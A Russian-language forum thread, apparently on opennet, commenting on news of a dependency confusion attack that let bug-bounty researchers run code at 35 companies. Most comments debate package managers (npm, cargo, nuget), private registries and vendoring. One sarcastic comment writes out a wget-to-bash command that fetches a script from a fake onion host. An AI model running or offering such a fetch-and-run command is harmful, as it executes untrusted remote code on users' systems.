"Атака на зависимости позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний"
 Вариант для распечатки |
Пред. тема | След. тема | ||
| Форум Разговоры, обсуждение новостей | |||
|---|---|---|---|
| Изначальное сообщение | [ Отслеживать ] | ||
| "Атака на зависимости позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний" | +/– |  |
| Сообщение от opennews (?), 10-Фев-21, 11:03 | ||
Представлен поразительный по своей простоте метод атаки на зависимости в приложениях, при разработке которых используются внутренние репозитории пакетов. Выявившие проблему исследователи смогли выполнить свой код на внутренних серверах 35 компаний, среди которых PayPal, Micrоsoft, Apple, Netflix, Uber, Tesla и Shopify. Взломы проводились в рамках программ Bug Bounty, согласованно с атакуемыми компаниями, и уже принесли авторам 130 тысяч долларов, выплаченных в форме вознаграждений за выявление уязвимостей (выплаты продолжают поступать)... | ||
| Ответить | Правка | Cообщить модератору | ||
| Оглавление |
| Сообщения | [Сортировка по времени | RSS] |
| 1. "Атака на зависимости позволила выполнить код на серверах Pay..." | +55 +/– | |
| Сообщение от Leftpad (?), 10-Фев-21, 11:03 | ||
Нужно больше зависимостей и скриптов установки. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
 | ||
| 3. Скрыто модератором | –12 +/– | |
| Сообщение от Лудакрис (?), 10-Фев-21, 11:08 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 6. Скрыто модератором | –4 +/– | |
| Сообщение от Аноним (6), 10-Фев-21, 11:15 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 12. Скрыто модератором | –5 +/– | |
| Сообщение от Лудакрис (?), 10-Фев-21, 11:31 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 58. Скрыто модератором | +1 +/– | |
| Сообщение от Аноним (58), 10-Фев-21, 13:24 | ||
| Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору | ||
| ||
| 8. "Атака на зависимости позволила выполнить код на серверах Pay..." | +11 +/– | |
| Сообщение от Аноним (8), 10-Фев-21, 11:18 | ||
Не зря же в расте даже базовые возможности - во внешних модулях. Растаманы приготовили благодатную почву... | ||
| Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору | ||
| ||
| 65. "Атака на зависимости позволила выполнить код на серверах Pay..." | +5 +/– | |
| Сообщение от Аноним (65), 10-Фев-21, 13:30 | ||
https://www.reddit.com/r/rust/comments/lgl7bf/is_cargo_vulne.../ | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 147. "Атака на зависимости позволила выполнить код на серверах Pay..." | +5 +/– |  |
Сообщение от topin89 (ok), 10-Фев-21, 20:08 | ||
Озвучу для тех, кому лень переходить: | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 202. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от rex (??), 18-Фев-21, 13:30 | ||
В смысле, никто не думал заранее? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 10. "Атака на зависимости позволила выполнить код на серверах Pay..." | +9 +/– | |
| Сообщение от Аноним (10), 10-Фев-21, 11:20 | ||
Больше зависимостей богу зависимостей! Да здравствует leftpad. | ||
| Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору | ||
| ||
| 101. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (-), 10-Фев-21, 15:04 | ||
Да здравствует Haskell! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 180. "Атака на зависимости позволила выполнить код на серверах Pay..." | +4 +/– | |
| Сообщение от ЧешкиЧехова (?), 11-Фев-21, 19:07 | ||
ЛапкоКодеры импортируют на лету непроверенное гавно из внешних источников в прод рантайм. | ||
| Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору | ||
| ||
| 196. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Aga (??), 14-Фев-21, 00:03 | ||
давайте тогда делать вебсайты без этих ваших фреймворков и MVC, будем складывать все в условный index.php, чтобы чувствовать себя сильными кодерами | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 198. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Аноним (-), 14-Фев-21, 08:14 | ||
> давайте тогда делать вебсайты без этих ваших фреймворков и MVC, будем складывать | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 203. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– |  |
| Сообщение от rico (ok), 18-Фев-21, 18:52 | ||
Принцип модульности Орлова: если из распечатки одного модуля программы можно свить веревку, на которой можно повесить программиста, его написавшего, то все это следует сделать. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 204. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– |  |
| Сообщение от RedEyedMan (ok), 26-Фев-21, 14:09 | ||
Вполне нормальное явление. Иначе зачем все эти либы и фреймворки, сильные обойдутся и без них. А я слабый, пользуюсь либами и фреймворками. | ||
| Ответить | Правка | К родителю #180 | Наверх | Cообщить модератору | ||
| ||
| 38. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– |  |
| Сообщение от Dzen Python (ok), 10-Фев-21, 12:50 | ||
Нужно больше васянских библиотек и костылей "на вызов одной функции" | ||
| Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору | ||
| ||
| 184. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (-), 12-Фев-21, 03:38 | ||
Так, блин, это ж программировать надо?! А вот это вебмакаки не умеют. Ну, сколько из вас хотя-бы код Хэмминга сможет накодить? Сами? Без подсматривания к другим и чужих либ? А чтоб еще и эффективно?! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 48. "Атака на зависимости позволила выполнить код на серверах Pay..." | +7 +/– | |
| Сообщение от Аноним (48), 10-Фев-21, 13:08 | ||
Правильно, если у тебя в большом проекте 1 000 000 однострочников и ты использовал этот проект как платформу для 1000 других проектов, то весь код между проектами нужно копировать. И не в коем случае не использовать менеджеры зависимости! И когда ты фиксишь например 100 функций-однострочников в одном проекте, то все их вручную нужно копировать в 100 других проектов. Гениально, надо продвигать эту идею в массы. | ||
| Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору | ||
| ||
| 84. "Атака на зависимости позволила выполнить код на серверах Pay..." | +11 +/– |  |
| Сообщение от YetAnotherOnanym (ok), 10-Фев-21, 14:19 | ||
Вообще-то, когда приходится фиксить сотни чужих пакетов, это достаточный повод сесть, подумать, и выбрать какую-то более другую платформу. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 183. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Bob (??), 12-Фев-21, 00:09 | ||
Или заводить трактор, взяв месяц больничного и месяц отпуска, оплачиваемых) | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 102. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (102), 10-Фев-21, 15:06 | ||
Так писали наши деды. Раньше позорным считалось переиспользование кода не только в соседних отделах, но даже в рамках одной программы. Если ты не можешь написать оригинальный код ad-hoc, то ты даже не программист, ты просто макака-копипастер. | ||
| Ответить | Правка | К родителю #48 | Наверх | Cообщить модератору | ||
| ||
| 157. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от italliano monkey (?), 11-Фев-21, 00:03 | ||
или просто Java-программист | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 205. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Sample (??), 01-Мрт-21, 14:58 | ||
Наши деды славные победы, вот где наши деды | ||
| Ответить | Правка | К родителю #102 | Наверх | Cообщить модератору | ||
| ||
| 185. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (-), 12-Фев-21, 03:39 | ||
> Правильно, если у тебя в большом проекте 1 000 000 однострочников | ||
| Ответить | Правка | К родителю #48 | Наверх | Cообщить модератору | ||
| ||
| 153. "Атака на зависимости позволила выполнить код на серверах Pay..." | +6 +/– | |
| Сообщение от InuYasha (??), 10-Фев-21, 22:27 | ||
Вообще от зависимостей надо лечиться, а то в диспансер на учёт поставят :) | ||
| Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору | ||
| ||
| 200. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (200), 15-Фев-21, 14:14 | ||
Ваш комментарий в моей голове был озвучен голосом нежити из Варкрафта 3 )) | ||
| Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору | ||
| 2. "Атака на зависимости позволила выполнить код на серверах Pay..." | +9 +/– |  |
| Сообщение от Леголас (ok), 10-Фев-21, 11:06 | ||
всё гениальное просто | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 51. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от AHOHUM (?), 10-Фев-21, 13:14 | ||
Природа красива в простоте сложности и сложности простоты. Не удаётся скрыться от сложности в простоту. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 194. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (194), 13-Фев-21, 00:49 | ||
Недавно я с удивлением заметил, какому количеству полезных вещей мы обязаны растительному миру нашей планеты. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 4. Скрыто модератором | –6 +/– | |
| Сообщение от DildoZilla (?), 10-Фев-21, 11:14 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 5. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Аноним (5), 10-Фев-21, 11:15 | ||
Дыра. Раста проблема тоже касается? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 18. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Лудакрис (?), 10-Фев-21, 11:36 | ||
а есть упоминание? читайте внимательнее, глупые аноны, это нелегко, знаю, но пытайтесь! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 21. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (21), 10-Фев-21, 11:41 | ||
Нет упоминанй, потому что Растом и его пакетником в не пользуются? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 22. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (5), 10-Фев-21, 11:42 | ||
Не хами! | ||
| Ответить | Правка | К родителю #18 | Наверх | Cообщить модератору | ||
| ||
| 49. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (48), 10-Фев-21, 13:12 | ||
Я не тот анон, но там написано "в других системах, таких как..." и дальше приводится пример (именно пример, а не весь список!!!) систем "таких как". То есть из текста следует, что проблеме может быть подвержен любой менеджер зависимостей даже если он не перечислен в данной статье. | ||
| Ответить | Правка | К родителю #18 | Наверх | Cообщить модератору | ||
| ||
| 113. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от An O Nim (?), 10-Фев-21, 16:13 | ||
Проблема ещё шире: переменчивость артефактов во внешних сетях. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 195. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (194), 13-Фев-21, 00:51 | ||
Да. В интернете может что угодно в любой момент исчезнуть навсегда, не оставив следов, и не достучишься. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 25. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Ананимус (?), 10-Фев-21, 11:53 | ||
Нет, там нужно указывать registry, откуда качать пакет. | ||
| Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору | ||
| ||
| 30. "Атака на зависимости позволила выполнить код на серверах Pay..." | +5 +/– | |
| Сообщение от cheater (?), 10-Фев-21, 12:03 | ||
Не раста, а cargo. | ||
| Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору | ||
| ||
| 32. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от Аноним (5), 10-Фев-21, 12:09 | ||
Да, это проблема и не только cargo, но и всего раста, потому что все используют cargo. В общем, недостатки - это продолжение достоинств. Хотелось бы, чтобы появилась полноценная возможность опираться в пакетах (крейтах) только на то, что идет с самим дистрибутивом линукса, не компрометируя себя связями с единственным иностранным внешним репозиторием. Обычно всем пофиг на это, но есть области программирования, где совсем не пофиг. Короче, исходная тема новости лишний говорит, что бесплатного сыра [в мышеловке] не бывает. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 37. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– |  |
| Сообщение от Siborgium (ok), 10-Фев-21, 12:28 | ||
cargo умеет работать с git-репозиториями и локальными пакетами. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 39. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Dzen Python (ok), 10-Фев-21, 12:53 | ||
И? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 68. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (68), 10-Фев-21, 13:38 | ||
В уже скомпилированном состоянии он будет содержать крейты в себе. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 79. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Аноним (8), 10-Фев-21, 13:58 | ||
> В нем нет динамической линковки, поскольку нет стабильно ABI | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 90. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– |  |
| Сообщение от Ordu (ok), 10-Фев-21, 14:30 | ||
Ничего не делали, я уже говорил в соседнем топике. Раскручивали язык, чтобы взять приз "most loved language" на stackoverflow. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 186. "Атака на зависимости позволила выполнить код на серверах Pay..." | –3 +/– | |
| Сообщение от Аноним (-), 12-Фев-21, 03:43 | ||
> доступна только при FFI (с либами, написанными на других языках) | ||
| Ответить | Правка | К родителю #68 | Наверх | Cообщить модератору | ||
| ||
| 78. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от cheater (?), 10-Фев-21, 13:57 | ||
> На локальные пакеты он сможет сослаться в уже скомпилированном состоянии? | ||
| Ответить | Правка | К родителю #39 | Наверх | Cообщить модератору | ||
| ||
| 41. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от Аноним (5), 10-Фев-21, 12:54 | ||
Мне интереснее, а можно ли при сборке приложения с помощью cargo использовать только то, что идет с дистрибутивом, вообще, не залезая в интернет (например, если это запрещено или даже, если нет интернета)? | ||
| Ответить | Правка | К родителю #37 | Наверх | Cообщить модератору | ||
| ||
| 70. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (68), 10-Фев-21, 13:43 | ||
Позволен git, путь, и crates.io. Можно создать свой https://github.com/rust-lang/crates.io если вы совсем большие, и указать в проекте адрес на него. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 72. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (68), 10-Фев-21, 13:45 | ||
Называется это (crates.io) registry https://doc.rust-lang.org/cargo/reference/registries.html | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 119. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (119), 10-Фев-21, 17:14 | ||
написал вместо того что бы сказать нет. | ||
| Ответить | Правка | К родителю #70 | Наверх | Cообщить модератору | ||
| ||
| 128. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (-), 10-Фев-21, 17:56 | ||
Это unsafe и не позволяет делать запланированное устаревание | ||
| Ответить | Правка | К родителю #41 | Наверх | Cообщить модератору | ||
| ||
| 134. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от cheater (?), 10-Фев-21, 18:25 | ||
> Мне интереснее, а можно ли при сборке приложения с помощью cargo использовать | ||
| Ответить | Правка | К родителю #41 | Наверх | Cообщить модератору | ||
| ||
| 146. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (5), 10-Фев-21, 19:53 | ||
Даже если сделать "cargo vendor", то изначально все равно крейты попадут в локальное хранилище (подкаталог проекта) из ненадежного сайта crates.io, т.е. такие крейты не будут вызывать доверия. Я же предпочел бы, чтобы крейты брались из дистрибутива линукса. Точнее, мне самому это не так важно, а важно то, что такое требование могут выставить потенциальные заказчики - к гадалке не ходи! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 149. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (149), 10-Фев-21, 20:29 | ||
Да, уважающие себя дистрибутивы, вроде Дебиана и Федоры так и делают, поэтому в них и полно всяких devel-пакетов с крейтами Rust и модулями Go | ||
| Ответить | Правка | К родителю #41 | Наверх | Cообщить модератору | ||
| ||
| 34. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (68), 10-Фев-21, 12:22 | ||
Если у тебя конечно есть доступ к репозиторию. | ||
| Ответить | Правка | К родителю #30 | Наверх | Cообщить модератору | ||
| ||
| 35. "Атака на зависимости позволила выполнить код на серверах Pay..." | –4 +/– | |
| Сообщение от Аноним (68), 10-Фев-21, 12:24 | ||
А при чем тут Раст? Он же не скриптовый вроде | ||
| Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору | ||
| ||
| 59. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от pda (?), 10-Фев-21, 13:26 | ||
Проблема не в языках, а в пакетных менеджерах. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 156. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (156), 10-Фев-21, 23:38 | ||
а там написано, но это ж читать букавки надо, чему многи не обучены ))) | ||
| Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору | ||
| ||
| 199. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (199), 14-Фев-21, 23:56 | ||
в русте зависимости ставятся через wget https://sploit.onion/l33t.sh | bash. до менеджера пакета форк-бомба просто не дойдёт - сработает раньше. безопасность же. | ||
| Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору | ||
| 7. "Атака на зависимости позволила выполнить код на серверах Pay..." | +13 +/– |  |
| Сообщение от тоже Аноним (ok), 10-Фев-21, 11:17 | ||
Рекомендации по защите не работают. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 11. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Lex (??), 10-Фев-21, 11:20 | ||
> Проблема в том, что пакетные менеджеры, такие как npm .. пытаются загрузить внутренние зависимости компаний в том числе и из публичных репозиториев | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 40. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Dzen Python (ok), 10-Фев-21, 12:54 | ||
Ты что! Там жЫ уважаемые девляпсы и сениоры! Они такой код пишуть - аж закачаешься (от эмоций!)! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 54. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от AHOHUM (?), 10-Фев-21, 13:20 | ||
Не пишуть! А рисуютЪ!!! :)) Баги фиксят в продукте исправлением пары строк в конфигурации запуска. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 118. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от YetAnotherOnanym (ok), 10-Фев-21, 17:07 | ||
Скорее уволят начотдела, у которого програмеры пишут недостаточно быстро. | ||
| Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору | ||
| 14. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– |  |
| Сообщение от ryoken (ok), 10-Фев-21, 11:32 | ||
Так им всем и надо. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 23. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (-), 10-Фев-21, 11:46 | ||
> а также внутренние зависимости, которые не распространяются публично и загружаются из собственных репозиториев. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 24. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (24), 10-Фев-21, 11:51 | ||
А как они узнали их имена ? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 26. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от Аноним (24), 10-Фев-21, 11:55 | ||
> как исследователь случайно обратил внимание, что в публикуемом на GitHub общедоступном коде многие компании не очищают из manifest-файлов упоминание дополнительных зависимостей, применяемых во внутренних проектах или при реализации расширенной функциональности. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 197. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (-), 14-Фев-21, 05:43 | ||
На этот случай есть безопасТное восстановление паролей через ваши безопасТные мобильники. Номера на которых сейчас не подделывает только ленивый. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 29. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от kissmyass (?), 10-Фев-21, 12:02 | ||
ну например если дотнет то прям в файле проекта | ||
| Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору | ||
| ||
| 85. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (24), 10-Фев-21, 14:20 | ||
В смысле ? Разве оно первым делом не локальный файл ищет ? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 100. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от kissmyass (?), 10-Фев-21, 15:03 | ||
> В смысле ? Разве оно первым делом не локальный файл ищет ? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 31. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от kissmyass (?), 10-Фев-21, 12:04 | ||
а если доступа к коду нет, но есть к бинарникам, то обычно одна ассембли - один nuget пакет | ||
| Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору | ||
| 27. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от bsdun (?), 10-Фев-21, 11:58 | ||
Использовали бы FreeBSD и её дерево портов, проблем бы не было! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 28. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от kissmyass (?), 10-Фев-21, 11:58 | ||
Я тоже немного офигел когда приватные пакеты искались на nuget.org | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 86. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– |  |
| Сообщение от JL2001 (ok), 10-Фев-21, 14:21 | ||
> Я тоже немного офигел когда приватные пакеты искались на nuget.org | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 103. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от kissmyass (?), 10-Фев-21, 15:09 | ||
>> Я тоже немного офигел когда приватные пакеты искались на nuget.org | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 109. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 15:55 | ||
>>> Я тоже немного офигел когда приватные пакеты искались на nuget.org | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 33. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– |  |
| Сообщение от Fracta1L (ok), 10-Фев-21, 12:10 | ||
Зависимости эт плохо пнятненько | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 148. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Сишные дырени (?), 10-Фев-21, 20:09 | ||
Сильвупле | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 36. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от qweqwe (?), 10-Фев-21, 12:27 | ||
composer у php не подвержен такой бяке? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 88. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (88), 10-Фев-21, 14:24 | ||
Если сам не наделаешь | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 42. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от Аноним (42), 10-Фев-21, 12:54 | ||
>многие компании не очищают из manifest-файлов упоминание дополнительных зависимостей | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 43. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от Аноним (-), 10-Фев-21, 12:57 | ||
Это где так ? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 151. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Атон (?), 10-Фев-21, 21:12 | ||
*банк | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 162. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 11-Фев-21, 02:17 | ||
> *банк | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 174. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Атон (?), 11-Фев-21, 14:41 | ||
>> *банк | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 44. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Dzen Python (ok), 10-Фев-21, 12:58 | ||
В нормальных компаниях к тому моменту, когда они выкладывают код/имеют зрелый продукт на руках уже есть набор нормальных опенсорцных .so'шников ИЛИ свой набор отлаженных, оптимизированных homebrew-либ. Ни или в сама крайнем случае - нормальная купленная библитека на внутреннем сервере. А не набор васянских лефтпадов из NPM | ||
| Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору | ||
| ||
| 46. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (46), 10-Фев-21, 13:05 | ||
Если уж этим на "проверены службой безопасности" не хватает, то где тогда "нормальные" водятся? | ||
| Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору | ||
| ||
| 87. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 14:23 | ||
> Ставится со своего, все чужие пакеты в котором проверены службой безопасности. | ||
| Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору | ||
| ||
| 106. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от www2 (??), 10-Фев-21, 15:33 | ||
Пользователи Windows, скачавшие её с торрентов у Васяна и потом качающие на неё софт с кряками по первой ссылке из поиска - вот настоящие эльфы и наркоманы. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 132. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 18:15 | ||
> сертифицированные операционные системы, поставить на которые обновлённый пакет - значит | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 45. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Gogi (??), 10-Фев-21, 13:02 | ||
Этот случай только лишний раз доказывает ущербность идеи "автоматических пакетов". Сеть априори считается ОПАСНЫМ местом. А вы оттуда тягаете пакеты на автомате и надеетесь, что хакеры это пропустят?? :) | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 47. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (-), 10-Фев-21, 13:06 | ||
Может наоборот ? Там где комерческое - то пофиг, барин то платит. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 114. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от An O Nim (?), 10-Фев-21, 16:18 | ||
Считается, что так тоже не катит. Т.к. в полезного в коммерческом вырастет тот, кто заботится. Двуличка с хорошим результатом - редкость. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 89. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 14:28 | ||
> Этот случай только лишний раз доказывает ущербность идеи "автоматических пакетов". Сеть | ||
| Ответить | Правка | К родителю #45 | Наверх | Cообщить модератору | ||
| ||
| 115. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от An O Nim (?), 10-Фев-21, 16:24 | ||
Редхат как раз и есть внутренние штатные репо самого дистра RHE Линукс. Репы RHEL как раз внутренние репо самого RHEL. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
